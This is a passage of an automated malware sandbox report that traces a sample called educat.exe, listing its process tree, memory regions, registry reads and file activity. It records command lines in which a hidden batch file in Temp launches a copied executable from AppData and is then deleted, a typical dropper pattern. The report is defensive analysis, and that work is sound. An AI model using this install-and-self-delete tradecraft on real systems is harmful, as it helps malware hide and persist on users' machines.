Enumerate Keys HKEY_USERS - True 1
Fn
Enumerate Keys HKEY_USERS - True 1
Fn
Enumerate Keys HKEY_USERS - True 1
Fn
Enumerate Keys HKEY_USERS - True 1
Fn
Enumerate Keys HKEY_USERS - True 1
Fn
Enumerate Keys HKEY_USERS - True 1
Fn
Enumerate Keys HKEY_USERS - False 1
Fn
Process (2)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat show_window = SW_HIDE True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Module (9)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\users\ciihmnxmn6ps\desktop\educat.exe base_address = 0x400000 True 3
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75260000 True 1
Fn
Get Handle c:\windows\syswow64\user32.dll base_address = 0x77150000 True 1
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77ca0000 True 1
Fn
Get Filename c:\users\ciihmnxmn6ps\desktop\educat.exe process_name = c:\users\ciihmnxmn6ps\desktop\educat.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsWow64Process, address_out = 0x752796e0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetWindowThreadProcessId, address_out = 0x7716ba70 True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Find - class_name = ProgMan True 1
Fn
System (17)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = LHNIWSJ True 1
Fn
Sleep duration = 500 milliseconds (0.500 seconds) True 10
Fn
Get Time type = Ticks, time = 130187 True 1
Fn
Get Time type = Ticks, time = 135671 True 4
Fn
Get Info type = Operating System True 1
Fn
Process #3: cmd.exe
254 0
»
Information Value
ID #3
File Name c:\windows\syswow64\cmd.exe
Command Line C:\Windows\system32\cmd.exe /c ""C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat" "C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" "C:\Users\CIIHMN~1\Desktop\educat.exe""
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:00:58, Reason: Child Process
Unmonitor End Time: 00:01:11, Reason: Self Terminated
Monitor Duration 00:00:13
OS Process Information
»
Information Value
PID 0xf40
Parent PID 0xda4 (c:\users\ciihmnxmn6ps\desktop\educat.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x F44
0x F98
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000400000 0x00400000 0x0041ffff Private Memory rw True False False -
pagefile_0x0000000000400000 0x00400000 0x0040ffff Pagefile Backed Memory rw True False False -
private_0x0000000000410000 0x00410000 0x00413fff Private Memory rw True False False -
private_0x0000000000420000 0x00420000 0x00421fff Private Memory rw True False False -
private_0x0000000000420000 0x00420000 0x00423fff Private Memory rw True False False -
pagefile_0x0000000000430000 0x00430000 0x00443fff Pagefile Backed Memory r True False False -
private_0x0000000000450000 0x00450000 0x0048ffff Private Memory rw True False False -
private_0x0000000000490000 0x00490000 0x0058ffff Private Memory rw True False False -
pagefile_0x0000000000590000 0x00590000 0x00593fff Pagefile Backed Memory r True False False -
pagefile_0x00000000005a0000 0x005a0000 0x005a0fff Pagefile Backed Memory r True False False -
private_0x00000000005b0000 0x005b0000 0x005b1fff Private Memory rw True False False -
private_0x00000000005c0000 0x005c0000 0x005cffff Private Memory rw True False False -
locale.nls 0x005d0000 0x0068dfff Memory Mapped File r False False False -
private_0x0000000000690000 0x00690000 0x006cffff Private Memory rw True False False -
private_0x00000000006d0000 0x006d0000 0x006dffff Private Memory rw True False False -
cmd.exe.mui 0x006e0000 0x00700fff Memory Mapped File r False False False -
private_0x00000000007b0000 0x007b0000 0x008affff Private Memory rw True False False -
private_0x00000000008b0000 0x008b0000 0x009affff Private Memory rw True False False -
cmd.exe 0x009e0000 0x00a2ffff Memory Mapped File rwx True False False -
pagefile_0x0000000000a30000 0x00a30000 0x04a2ffff Pagefile Backed Memory - True False False -
private_0x0000000004bd0000 0x04bd0000 0x04bdffff Private Memory rw True False False -
sortdefault.nls 0x04be0000 0x04f16fff Memory Mapped File r False False False -
wow64cpu.dll 0x64ae0000 0x64ae7fff Memory Mapped File rwx False False False -
wow64win.dll 0x64af0000 0x64b62fff Memory Mapped File rwx False False False -
wow64.dll 0x64b70000 0x64bbefff Memory Mapped File rwx False False False -
cmdext.dll 0x74bf0000 0x74bf7fff Memory Mapped File rwx False False False -
bcryptprimitives.dll 0x74d40000 0x74d98fff Memory Mapped File rwx False False False -
cryptbase.dll 0x74da0000 0x74da9fff Memory Mapped File rwx False False False -
sspicli.dll 0x74db0000 0x74dcdfff Memory Mapped File rwx False False False -
kernelbase.dll 0x74e70000 0x74fe5fff Memory Mapped File rwx False False False -
kernel32.dll 0x75260000 0x7534ffff Memory Mapped File rwx False False False -
advapi32.dll 0x76a10000 0x76a8afff Memory Mapped File rwx False False False -
sechost.dll 0x76c40000 0x76c82fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x76d90000 0x76e3bfff Memory Mapped File rwx False False False -
msvcrt.dll 0x779f0000 0x77aadfff Memory Mapped File rwx False False False -
ntdll.dll 0x77ca0000 0x77e18fff Memory Mapped File rwx False False False -
pagefile_0x000000007e960000 0x7e960000 0x7ea5ffff Pagefile Backed Memory r True False False -
pagefile_0x000000007ea60000 0x7ea60000 0x7ea82fff Pagefile Backed Memory r True False False -
private_0x000000007ea87000 0x7ea87000 0x7ea87fff Private Memory rw True False False -
private_0x000000007ea88000 0x7ea88000 0x7ea8afff Private Memory rw True False False -
private_0x000000007ea8b000 0x7ea8b000 0x7ea8dfff Private Memory rw True False False -
private_0x000000007ea8e000 0x7ea8e000 0x7ea8efff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000007fff0000 0x7fff0000 0x7df8ee37ffff Private Memory r True False False -
pagefile_0x00007df8ee380000 0x7df8ee380000 0x7ff8ee37ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ff8ee380000 0x7ff8ee541fff Memory Mapped File rwx False False False -
private_0x00007ff8ee542000 0x7ff8ee542000 0x7ffffffeffff Private Memory r True False False -
Host Behavior
File (202)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 3
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 3
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
Get Info C:\Users\CIiHmnxMn6Ps\Desktop type = file_attributes True 2
Fn
Get Info "C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat" type = file_attributes False 1
Fn
Get Info - type = file_type True 3
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 25
Fn
Get Info - type = file_type True 3
Fn
Get Info C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat type = file_attributes True 2
Fn
Get Info C:\Users\CIIHMN~1\AppData\Local\Temp\74EE type = file_attributes True 1
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 88
Fn
Open STD_INPUT_HANDLE - True 7
Fn
Open - - True 12
Fn
Open - - True 13
Fn
Open \??\C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat desired_access = DELETE, open_options = FILE_NON_DIRECTORY_FILE, FILE_DELETE_ON_CLOSE, FILE_OPEN_FOR_BACKUP_INTENT, share_mode = FILE_SHARE_DELETE True 1
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Read - size = 8191, size_out = 110 True 1
Fn
Data
Read - size = 8191, size_out = 99 True 1
Fn
Data
Read - size = 8191, size_out = 66 True 1
Fn
Data
Read - size = 8191, size_out = 50 True 1
Fn
Data
Read - size = 8191, size_out = 19 True 1
Fn
Data
Read - size = 8191, size_out = 6 True 1
Fn
Data
Read - size = 8191, size_out = 0 True 1
Fn
Write STD_OUTPUT_HANDLE size = 2 True 8
Fn
Data
Write STD_OUTPUT_HANDLE size = 30 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 3 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 4 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 63 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 12 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 102 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 13 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 10 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 54 True 1
Fn
Data
Write STD_ERROR_HANDLE size = 33 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 121, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\cmd.exe os_pid = 0xf9c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x9e0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75260000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x752a2780 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x7527fa80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x7527a790 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x74f835c0 True 1
Fn
Environment (24)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 7
Fn
Data
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 3
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 4
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = PROMPT, result_out = $P$G True 2
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #5: cmd.exe
54 0
»
Information Value
ID #5
File Name c:\windows\syswow64\cmd.exe
Command Line cmd /C ""C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" "C:\Users\CIIHMN~1\Desktop\educat.exe""
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:01:05, Reason: Child Process
Unmonitor End Time: 00:01:11, Reason: Self Terminated
Monitor Duration 00:00:06
OS Process Information
»
Information Value
PID 0xf9c
Parent PID 0xf40 (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x FA0
0x FA4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000280000 0x00280000 0x0029ffff Private Memory rw True False False -
pagefile_0x0000000000280000 0x00280000 0x0028ffff Pagefile Backed Memory rw True False False -
private_0x0000000000290000 0x00290000 0x00293fff Private Memory rw True False False -
private_0x00000000002a0000 0x002a0000 0x002a1fff Private Memory rw True False False -
private_0x00000000002a0000 0x002a0000 0x002a3fff Private Memory rw True False False -
pagefile_0x00000000002b0000 0x002b0000 0x002c3fff Pagefile Backed Memory r True False False -
private_0x00000000002d0000 0x002d0000 0x0030ffff Private Memory rw True False False -
private_0x0000000000310000 0x00310000 0x0040ffff Private Memory rw True False False -
pagefile_0x0000000000410000 0x00410000 0x00413fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000420000 0x00420000 0x00420fff Pagefile Backed Memory r True False False -
private_0x0000000000430000 0x00430000 0x00431fff Private Memory rw True False False -
private_0x0000000000440000 0x00440000 0x0047ffff Private Memory rw True False False -
private_0x00000000004c0000 0x004c0000 0x004cffff Private Memory rw True False False -
private_0x00000000004d0000 0x004d0000 0x004dffff Private Memory rw True False False -
private_0x0000000000520000 0x00520000 0x0061ffff Private Memory rw True False False -
locale.nls 0x00620000 0x006ddfff Memory Mapped File r False False False -
private_0x00000000006e0000 0x006e0000 0x007dffff Private Memory rw True False False -
cmd.exe 0x009e0000 0x00a2ffff Memory Mapped File rwx True False False -
pagefile_0x0000000000a30000 0x00a30000 0x04a2ffff Pagefile Backed Memory - True False False -
sortdefault.nls 0x04a30000 0x04d66fff Memory Mapped File r False False False -
wow64cpu.dll 0x64ae0000 0x64ae7fff Memory Mapped File rwx False False False -
wow64win.dll 0x64af0000 0x64b62fff Memory Mapped File rwx False False False -
wow64.dll 0x64b70000 0x64bbefff Memory Mapped File rwx False False False -
apphelp.dll 0x74ca0000 0x74d30fff Memory Mapped File rwx False False False -
kernelbase.dll 0x74e70000 0x74fe5fff Memory Mapped File rwx False False False -
kernel32.dll 0x75260000 0x7534ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x779f0000 0x77aadfff Memory Mapped File rwx False False False -
ntdll.dll 0x77ca0000 0x77e18fff Memory Mapped File rwx False False False -
sysmain.sdb 0x7e4e0000 0x7e86ffff Memory Mapped File r False False False -
pagefile_0x000000007e870000 0x7e870000 0x7e96ffff Pagefile Backed Memory r True False False -
pagefile_0x000000007e970000 0x7e970000 0x7e992fff Pagefile Backed Memory r True False False -
private_0x000000007e996000 0x7e996000 0x7e996fff Private Memory rw True False False -
private_0x000000007e999000 0x7e999000 0x7e99bfff Private Memory rw True False False -
private_0x000000007e99c000 0x7e99c000 0x7e99efff Private Memory rw True False False -
private_0x000000007e99f000 0x7e99f000 0x7e99ffff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000007fff0000 0x7fff0000 0x7df8ee37ffff Private Memory r True False False -
pagefile_0x00007df8ee380000 0x7df8ee380000 0x7ff8ee37ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ff8ee380000 0x7ff8ee541fff Memory Mapped File rwx False False False -
private_0x00007ff8ee542000 0x7ff8ee542000 0x7ffffffeffff Private Memory r True False False -
Host Behavior
File (10)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\CIiHmnxMn6Ps\Desktop type = file_attributes True 2
Fn
Get Info "C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" type = file_attributes False 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 248, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe os_pid = 0xfa8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x9e0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75260000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x752a2780 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x7527fa80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x7527a790 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x74f835c0 True 1
Fn
Environment (16)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Fn
Data
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #6: autoclb.exe
47 0
»
Information Value
ID #6
File Name c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe
Command Line "C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" "C:\Users\CIIHMN~1\Desktop\educat.exe"
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:01:05, Reason: Child Process
Unmonitor End Time: 00:01:11, Reason: Self Terminated
Monitor Duration 00:00:06
OS Process Information
»
Information Value
PID 0xfa8
Parent PID 0xf9c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x FAC
0x FB0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory rw True False False -
pagefile_0x0000000000040000 0x00040000 0x00053fff Pagefile Backed Memory r True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory rw True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory rw True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory r True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory r True False False -
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory rw True False False -
private_0x00000000001d0000 0x001d0000 0x001d0fff Private Memory rw True False False -
private_0x00000000001e0000 0x001e0000 0x001effff Private Memory rw True False False -
locale.nls 0x001f0000 0x002adfff Memory Mapped File r False False False -
private_0x00000000002b0000 0x002b0000 0x002b1fff Private Memory rwx True False False -
private_0x00000000002d0000 0x002d0000 0x003cffff Private Memory rw True False False -
autoclb.exe 0x00400000 0x00512fff Memory Mapped File rwx True False False -
private_0x0000000000520000 0x00520000 0x0055ffff Private Memory rw True False False -
private_0x0000000000560000 0x00560000 0x0065ffff Private Memory rw True False False -
pagefile_0x0000000000660000 0x00660000 0x007e7fff Pagefile Backed Memory r True False False -
private_0x00000000007f0000 0x007f0000 0x008affff Private Memory rw True False False -
private_0x00000000007f0000 0x007f0000 0x0085efff Private Memory rwx True False False -
private_0x00000000008a0000 0x008a0000 0x008affff Private Memory rw True False False -
private_0x00000000008b0000 0x008b0000 0x00960fff Private Memory rwx True False False -
private_0x0000000000970000 0x00970000 0x0097ffff Private Memory rw True False False -
pagefile_0x0000000000980000 0x00980000 0x00b00fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000b10000 0x00b10000 0x01f0ffff Pagefile Backed Memory r True False False -
private_0x0000000001f10000 0x01f10000 0x02086fff Private Memory rw True False False -
pagefile_0x0000000001f10000 0x01f10000 0x01f80fff Pagefile Backed Memory rwx True False False -
private_0x00000000020f0000 0x020f0000 0x020fffff Private Memory rw True False False -
private_0x0000000002100000 0x02100000 0x02278fff Private Memory rw True False False -
private_0x0000000002100000 0x02100000 0x02276fff Private Memory rw True False False -
private_0x0000000002280000 0x02280000 0x023f8fff Private Memory rw True False False -
wow64cpu.dll 0x64ae0000 0x64ae7fff Memory Mapped File rwx False False False -
wow64win.dll 0x64af0000 0x64b62fff Memory Mapped File rwx False False False -
wow64.dll 0x64b70000 0x64bbefff Memory Mapped File rwx False False False -
version.dll 0x74b40000 0x74b47fff Memory Mapped File rwx False False False -
comctl32.dll 0x74b50000 0x74be1fff Memory Mapped File rwx False False False -
apphelp.dll 0x74ca0000 0x74d30fff Memory Mapped File rwx False False False -
bcryptprimitives.dll 0x74d40000 0x74d98fff Memory Mapped File rwx False False False -
cryptbase.dll 0x74da0000 0x74da9fff Memory Mapped File rwx False False False -
sspicli.dll 0x74db0000 0x74dcdfff Memory Mapped File rwx False False False -
kernelbase.dll 0x74e70000 0x74fe5fff Memory Mapped File rwx False False False -
kernel32.dll 0x75260000 0x7534ffff Memory Mapped File rwx False False False -
powrprof.dll 0x753b0000 0x753f3fff Memory Mapped File rwx False False False -
imm32.dll 0x75400000 0x7542afff Memory Mapped File rwx False False False -
shell32.dll 0x75430000 0x767eefff Memory Mapped File rwx False False False -
profapi.dll 0x76810000 0x7681efff Memory Mapped File rwx False False False -
advapi32.dll 0x76a10000 0x76a8afff Memory Mapped File rwx False False False -
sechost.dll 0x76c40000 0x76c82fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x76d90000 0x76e3bfff Memory Mapped File rwx False False False -
combase.dll 0x76e40000 0x76ff9fff Memory Mapped File rwx False False False -
gdi32.dll 0x77000000 0x7714cfff Memory Mapped File rwx False False False -
user32.dll 0x77150000 0x7728ffff Memory Mapped File rwx False False False -
shlwapi.dll 0x77290000 0x772d3fff Memory Mapped File rwx False False False -
shcore.dll 0x77340000 0x773ccfff Memory Mapped File rwx False False False -
windows.storage.dll 0x773f0000 0x778ccfff Memory Mapped File rwx False False False -
msctf.dll 0x778d0000 0x779effff Memory Mapped File rwx False False False -
msvcrt.dll 0x779f0000 0x77aadfff Memory Mapped File rwx False False False -
kernel.appcore.dll 0x77c30000 0x77c3bfff Memory Mapped File rwx False False False -
ntdll.dll 0x77ca0000 0x77e18fff Memory Mapped File rwx False False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000007fff0000 0x7fff0000 0x7ff8ee37ffff Private Memory r True False False -
ntdll.dll 0x7ff8ee380000 0x7ff8ee541fff Memory Mapped File rwx False False False -
private_0x00007ff8ee542000 0x7ff8ee542000 0x7ffffffeffff Private Memory r True False False -
Host Behavior
File (24)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\SYSTEM32\ntdll.dll desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE True 3
Fn
Create C:\Windows\SYSTEM32\ntdll.dll desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE True 4
Fn
Get Info C:\Windows\SYSTEM32\ntdll.dll type = size True 3
Fn
Get Info C:\Windows\SYSTEM32\ntdll.dll type = size True 4
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
